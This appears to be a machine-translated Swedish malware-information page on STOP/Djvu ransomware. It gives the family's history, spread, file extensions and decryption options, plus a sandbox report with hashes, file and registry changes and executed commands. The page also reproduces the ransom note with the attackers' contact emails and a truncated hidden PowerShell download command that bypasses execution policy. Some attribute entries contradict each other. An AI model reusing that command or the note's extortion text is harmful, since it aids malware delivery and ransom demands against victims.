STOPP Djvu Ransomware

STOP Ransomware-familjen, även benämnd STOP Djvu Ransomware-familjen, är en hotfull del av skadlig kod. STOPP Djvu är bara ett av de flera hot som delar gemensamma egenskaper och härrör från STOP-ransomware, även om vissa av deras metoder för att påverka filtyper och kryptera filtillägg skiljer sig åt.
Den ursprungliga STOP Ransomware sågs av säkerhetsforskare så tidigt som i februari 2018. Sedan dess har den utvecklats och dess familj av kloner och offshoots har vuxit. Den främsta metoden för distribution av STOP-ransomware var skräppostkampanjer med skadade bilagor.
STOPP Djvu Ransomware utför på ett sätt som liknar andra ransomware-hot av sitt slag, kryptering och blockering av åtkomst till nyckelfiler som användare kan använda i sitt system. Personliga filer, bilder, dokument och mer kan krypteras och i princip inaktiveras för alla användare på maskinen. STOPP Djvu Ransomware sågs först i december 2018 i vad som tycktes vara en ganska framgångsrik infektionskampanj online. Forskare var inte medvetna om hur ransomware sprids, men senare rapporterade offren att de upptäckte infektioner efter att de laddade ner keygens eller sprickor. När infiltrationen inträffar ändrar STOPP Djvu ransomware Windows-inställningarna och lägger till filer med ett antal namn, till exempel .djvu, .djvus, .djvuu, .uudjvu, .udjvu eller .djvuq och de senaste .promorad och .promock-tilläggen. De nyare versionerna har inte en dekrypterare ännu, men de äldre kan dekrypteras med hjälp av STOPDecrypter. Användare rekommenderas att undvika att betala någon lösen, oavsett vad.
Metoden som används för att blockera åtkomst till filerna använder RSA-krypteringsalgoritmen. Även om dekryptering av filerna kan tyckas svårt för oerfarna användare, finns det definitivt inget behov av att göra några ansträngningar för att betala människorna bakom hotet. Falska löften ges vanligtvis i sådana situationer, så användare kan snabbt upptäcka att de ignoreras när betalningar gjordes.
Attacker av STOPP Djvu Ransomware rapporterades först i slutet av 2018. Den huvudsakliga distributionsmetoden för STOPP Djvu förblev skräppostmeddelanden och justeringar till kärnan i ransomware var relativt små. Majoriteten av falska, komprometterade bilagor som används i skräppostmeddelandena var makroaktiverade kontordokument eller falska PDF-filer som skulle köra ransomware utan offrets vetskap. STOPP Djvus beteende har inte förändrats mycket heller - ransomware tar fortfarande bort alla Shadow Volume-ögonblicksbilder för att bli av med säkerhetskopior och börjar sedan kryptera offrets filer.
Det finns mindre ändringar i lösensedeln, som sparas som '_openme.txt' på offrets skrivbord. Texten till lösensedeln finns här:
'[lösenbok start]
————————— ALLA DINA FILAR ÄR Krypterade —————————
Oroa dig inte, du kan returnera alla dina filer!
Alla dina dokument, foton, databaser och annat viktigt är krypterade med starkaste kryptering och unik nyckel.
Den enda metoden för att återställa filer är att köpa dekrypteringsverktyg och unik nyckel åt dig.
Denna programvara dekrypterar alla dina krypterade filer.
Vilka garantier ger vi dig?
Du kan skicka en av dina krypterade filer från din dator och vi dekrypterar den gratis.
Men vi kan bara dekryptera 1 fil gratis. Filen får inte innehålla värdefull information
Försök inte använda dekrypteringsverktyg från tredje part eftersom det förstör dina filer.
Rabatt 50% tillgängligt om du kontaktar oss de första 72 timmarna.
————————————————————————————————————-
För att få den här programvaran måste du skriva på vårt e-postmeddelande:
helpshadow@india.com
Boka e-postadress för att kontakta oss:
helpshadow@firemail.cc
Ditt personliga ID: [string]
[lösensedeln slut] '
Ransomware begränsade sig till att byta namn på de krypterade filerna med .djvu-förlängningen ursprungligen, vilket var ett märkligt val eftersom .djvu faktiskt är ett legitimt filformat utvecklat av AT&T Labs och används för att lagra skannade dokument, något som liknar Adobes .pdf. Senare versioner av ransomware antog en rad andra tillägg för krypterade filer, inklusive '.chech,' '.luceq,' '.kroput1,' '.charck,' '.kropun ,,' .luces, '' .pulsar1, '' .uudjvu, '' .djvur, '' .tfude, '' .tfudeq 'och' .tfudet '.
Vissa stammar av STOPP Djvu-ransomware kan dekrypteras gratis med hjälp av den så kallade 'STOPDecrypter' som utvecklades av säkerhetsforskaren Michael Gillespie och är tillgänglig online som gratis nedladdning.
Innehållsförteckning
STOPP Djvu Ransomware Video
Tips: Slå PÅ ljudet och titta på videon i helskärmsläge .

STOPP Djvu Ransomware skärmdumpar
Analys rapport
Allmän information
| Efternamn: | STOP/DJVU Ransomware |
|---|---|
| Signaturstatus: | No Signature |
Kända prover
Kända prover
Det här avsnittet listar andra filexempel som tros vara associerade med den här familjen.|
MD5:
def8a7bfe5fe47d95a95085d8dbc7a53
SHA1:
7182d4b2f55a560d83edf0824e119f71fa8422b6
SHA256:
B83855EA63E7F28396099A5B6E877BE537E78E4A50DF720262461A1D13B02192
Filstorlek:
6.29 MB , 6292105 byte
|
|
MD5:
a6b8c0cb178c31dd347554c3e5a0d5f8
SHA1:
91864f269d696ee80869cfeb3c9a204f8031a3bb
SHA256:
4FFB8E9ADF508662B5E51CBEC75B2E07CE1CBBFAAB873F72EDC7BAC385421E2C
Filstorlek:
3.47 MB , 3471869 byte
|
|
MD5:
2336c9624d9a44c393d354206226f508
SHA1:
ea7edc388ad62990f52b9ed40df26d20f4e20190
SHA256:
CE48ED04C92143B7E91F9665DD9337B2EE0B9CC1B5AEE534D26C09E084F8ABB0
Filstorlek:
1.36 MB , 1359918 byte
|
|
MD5:
42f32aa699bc45a3638ddeb325ebebc1
SHA1:
508cea3ba2bf04cc6851295f92bf0e752071f6b8
SHA256:
16532B38591B713395C288B11610494BCC4C4537BE492D43C54D66FEB7B95FA4
Filstorlek:
1.33 MB , 1328186 byte
|
|
MD5:
2391d41548b6432191f73edefa273928
SHA1:
620b714f84955aa7fb9a2f2cd528daa1621e18af
SHA256:
4D1EFAA3477B0B8D84025F3F0109E97ABA7CEB37F174B9DC79B7966CBB430959
Filstorlek:
3.36 MB , 3357556 byte
|
Visa mer
|
MD5:
710c3a1beb616d4aa7d5ed9a7f8848e4
SHA1:
326da9ddc0ea840e83f31fbf1f3377a06c911fe5
SHA256:
051DAB5E5247E25D6EB059A574383FB1EC99A5A4AAF9AA3694240FE25FA260AB
Filstorlek:
1.36 MB , 1364106 byte
|
|
MD5:
601b120a6f39f72847b2f581a3d5f158
SHA1:
0cc5781c1cfe6c5d034bd098229773e80e083732
SHA256:
BEC2BFF460615A35D4EA35BF25E9F89337E35E73441A4AC07562CE8E89BED818
Filstorlek:
4.86 MB , 4858569 byte
|
|
MD5:
a7b76a49f289081961f8f3824f0b62ca
SHA1:
6908790199785be7fc6c4eeb1fe426ee1b66cc0b
SHA256:
1A721E054386833AEBBF94C75871143376897E92C4A48278DDE95E6987634F45
Filstorlek:
1.41 MB , 1406899 byte
|
|
MD5:
9f37930d62a1e08f68aa0a72472e7a55
SHA1:
27706b3ff639e5dfa264a823dbe9229cf34ae153
SHA256:
29039902EEA4EE24C4C6368AA9B1D7F86BEC65ADA3ABDB0B92C1FEF311ACD31F
Filstorlek:
600.12 KB , 600124 byte
|
|
MD5:
7a18839fe61e9cde0e8fea3100acfb2b
SHA1:
9476c97a73e027016e9f6f2f20c2fb19264cd837
SHA256:
0271095F0AD5C6F26C9738ED5636E751B8868C1AE3B08D5D8C5218121D9FEEAF
Filstorlek:
316.83 KB , 316832 byte
|
|
MD5:
fe17d0f940a226e80cc18b4399da4ffc
SHA1:
cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b
SHA256:
D869A00DFA1BE0DF6D08BB72B790894D1861834D5E350F5DD54A70C3711BA713
Filstorlek:
1.36 MB , 1363661 byte
|
|
MD5:
ed83bea5600457af815495b10f235b87
SHA1:
14ac62ce3ae6b19186544e46ad7710d1814e3a9c
SHA256:
FC0AE843E31F77574448FF343F0E92A9F1953B43DC2495FFE2CA5F7F8E777401
Filstorlek:
9.59 MB , 9590154 byte
|
|
MD5:
8cc4ef6bfd98074474e53cefc0029d0a
SHA1:
7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9
SHA256:
72BE2A65C8E36058A40FB1EF582E944721F5D041044F454509242E00E6745198
Filstorlek:
1.41 MB , 1407173 byte
|
|
MD5:
75e7ec1010908f6cf964ee32c9d57fed
SHA1:
7cccec52318eadb6771ceef6404e19fc46ec8d07
SHA256:
A309D56010D51F07741773ABCC44C767EF99C1031DEFA575F07D11DD11F09E35
Filstorlek:
2.44 MB , 2442353 byte
|
Attribut för körbara filer i Windows Portable
- File doesn't have "Rich" header
- File doesn't have debug information
- File doesn't have exports table
- File doesn't have relocations information
- File doesn't have security information
- File has exports table
- File has TLS information
- File is 32-bit executable
- File is 64-bit executable
- File is either console or GUI application
Visa mer
- File is GUI application (IMAGE_SUBSYSTEM_WINDOWS_GUI)
- File is Native application (NOT .NET application)
- File is not packed
- IMAGE_FILE_DLL is not set inside PE header (Executable)
- IMAGE_FILE_EXECUTABLE_IMAGE is set inside PE header (Executable Image)
Filikoner
Filikoner
Det här avsnittet visar ikonresurser som finns i exempelfamiljer. Skadlig programvara replikerar ofta ikoner som vanligtvis förknippas med legitim programvara för att vilseleda användare att tro att skadlig programvara är säker.Information om Windows PE-version
Information om Windows PE-version
Det här avsnittet visar värden och attribut som har ställts in i Windows-datastrukturen för filversionsinformation för exempel inom den här familjen. För att vilseleda användare lägger aktörer som skapar skadlig programvara ofta till falsk versionsinformation som imiterar legitim programvara.| Namn | Värde |
|---|---|
| Assembly Version | 1.4.1.0 |
| Comments | This installation was built with Inno Setup. |
| Company Name |
|
| File Description |
|
| File Version |
Visa mer
|
| Internal Name |
|
| Legal Copyright |
|
| Original Filename |
|
| Product Name |
Visa mer
|
| Product Version |
Visa mer
|
Digitala signaturer
Digitala signaturer
Det här avsnittet listar digitala signaturer som är kopplade till exempel inom denna familj. Vid analys och verifiering av digitala signaturer är det viktigt att bekräfta att signaturens rotauktoritet är en välkänd och pålitlig enhet och att signaturens status är god. Skadlig kod signeras ofta med icke-pålitliga digitala signaturer som är "självsignerade" (som enkelt kan skapas av en skapare av skadlig kod utan verifiering). Skadlig kod kan också signeras med legitima signaturer som har en ogiltig status, och med signaturer från tvivelaktiga rotauktoriteter med falska eller vilseledande "signernamn".| Undertecknare | Rot | Status |
|---|---|---|
| win.rar GmbH | DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | Self Signed |
| win.rar GmbH | GlobalSign CodeSigning CA - SHA256 - G3 | Hash Mismatch |
Filegenskaper
- .NET
- 2+ executable sections
- big overlay
- fptable
- HighEntropy
- Inno
- InnoSetup Installer
- Installer Manifest
- Installer Version
- MZ (In Overlay)
Visa mer
- No Version Info
- Nullsoft Installer
- RAR (In Overlay)
- RARinO
- Run
- SusSec
- vb6
- WinRAR SFX
- WRARSFX
- x64
- x86
Filer ändrade
Filer ändrade
Det här avsnittet listar filer som skapades, modifierades, flyttades och/eller raderades av exempel i den här familjen. Filsystemaktivitet kan ge värdefull insikt i hur skadlig kod fungerar i operativsystemet.| Fil | Attribut |
|---|---|
| \device\namedpipe | Generic Read,Write Attributes |
| \device\namedpipe | Generic Write,Read Attributes |
| \device\namedpipe\gmdasllogger | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-13e8d.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-2buvv.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-88uan.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-8gkji.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-af9e7.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-bfiig.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-dlucn.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp | Generic Write,Read Attributes |
Visa mer
| c:\users\user\appdata\local\temp\is-du263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-i0kj9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-jos42.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-l4opd.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\is-pk5hm.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-r9udb.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\is-shkd6.tmp\_isetup\_setup64.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data |
| c:\users\user\appdata\local\temp\nshfa46.tmp\chip.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\header.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\nsdialogs.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\screenshot.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\system.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\winrar-x64-721b1ru.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandex.bmp | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nshfa46.tmp\yandexbrowsersetup.exe | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsrfa35.tmp | Generic Read,Write Data,Write Attributes,Write extended,Append data,Delete |
| c:\users\user\appdata\local\temp\nsva331.tmp\banner.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\nsexec.dll | Generic Write,Read Attributes |
| c:\users\user\appdata\local\temp\nsva331.tmp\system.dll | Generic Write,Read Attributes |
Registerändringar
Registerändringar
Det här avsnittet listar registernycklar och värden som skapades, modifierades och/eller raderades av exempel i den här familjen. Aktivitet i Windows-registret kan ge värdefull insikt i skadlig kods funktionalitet. Dessutom skapar skadlig kod ofta registervärden för att automatiskt starta och bestå på obestämd tid efter att en första infektion har komprometterat systemet.| Nyckel::Värde | Data | API-namn |
|---|---|---|
| HKLM\software\microsoft\windows nt\currentversion\notifications\data::418a073aa3bc1c75 | wk � 8�jg�B �� �6 �v�� 7� �� �� ۀ�� � T�B� ����� ���%�� 3bBx �<�� �!#��$kF$�� %`� %�&� &�-'�!(�(X�(�) ;)E)�`*J*9*�",=� -!R0P%1`1�1HO 5,]5�G>�� @V� @�*A��BB�� E�mF | RegNtPreCreateKey |
| HKLM\system\controlset001\services\bam\state\usersettings\s-1-5-21-3119368278-1123331430-659265220-1001::\device\harddiskvolume2\windows\system32\conhost.exe | 졷鑂셱ǜ | RegNtPreCreateKey |
Windows API-användning
Windows API-användning
Det här avsnittet listar Windows API-anrop som används av exemplen i den här familjen. Windows API-användningsanalys är ett värdefullt verktyg som kan hjälpa till att identifiera skadlig aktivitet, såsom keylogging, eskalering av säkerhetsprivilegier, datakryptering, dataexfiltrering, störningar av antivirusprogram och manipulation av nätverksförfrågningar.| Kategori | API |
|---|---|
| Other Suspicious |
|
| Anti Debug |
|
| User Data Access |
|
| Process Manipulation Evasion |
|
| Process Shell Execute |
|
| Keyboard Access |
|
| Syscall Use |
Visa mer
|
| Encryption Used |
|
Shell-kommandokörning
Shell-kommandokörning
Det här avsnittet listar Windows Shell-kommandon som körs av exemplen i den här familjen. Windows Shell-kommandon utnyttjas ofta av skadlig kod för oönskade ändamål och kan användas för att utöka säkerhetsbehörigheter, ladda ner och starta annan skadlig kod, utnyttja sårbarheter, samla in och stjäla data och dölja skadlig aktivitet.
"C:\Users\Lehsoaco\AppData\Local\Temp\is-88UAN.tmp\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918.tmp" /SL5="$5036E,928289,131584,c:\users\user\downloads\ea7edc388ad62990f52b9ed40df26d20f4e20190_0001359918"
|
"C:\Users\Dfhrhqtz\AppData\Local\Temp\is-13E8D.tmp\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186.tmp" /SL5="$802E8,896816,131584,c:\users\user\downloads\508cea3ba2bf04cc6851295f92bf0e752071f6b8_0001328186"
|
"C:\Users\Eberzneu\AppData\Local\Temp\is-DU263.tmp\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106.tmp" /SL5="$30364,932379,131584,c:\users\user\downloads\326da9ddc0ea840e83f31fbf1f3377a06c911fe5_0001364106"
|
"C:\Users\Qxnqehmu\AppData\Local\Temp\is-8GKJI.tmp\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569.tmp" /SL5="$402E8,3435751,309760,c:\users\user\downloads\0cc5781c1cfe6c5d034bd098229773e80e083732_0004858569"
|
"C:\Users\Qlwpcgcn\AppData\Local\Temp\is-I0KJ9.tmp\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899.tmp" /SL5="$30336,975597,131584,c:\users\user\downloads\6908790199785be7fc6c4eeb1fe426ee1b66cc0b_0001406899"
|
Visa mer
powershell -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "try { $WebClient = New-Object System.Net.WebClient
|
"C:\Users\Czxnhiuo\AppData\Local\Temp\is-L4OPD.tmp\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661.tmp" /SL5="$40356,931898,131584,c:\users\user\downloads\cc1bd23b0c7ff5da8ff996717b3969b7ebb9c67b_0001363661"
|
"C:\Users\Rziyzfeg\AppData\Local\Temp\is-DLUCN.tmp\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173.tmp" /SL5="$1C02AC,975756,131584,c:\users\user\downloads\7604b8cd9736a016748a1d2d1fe3eb9ec9db1bc9_0001407173"
|


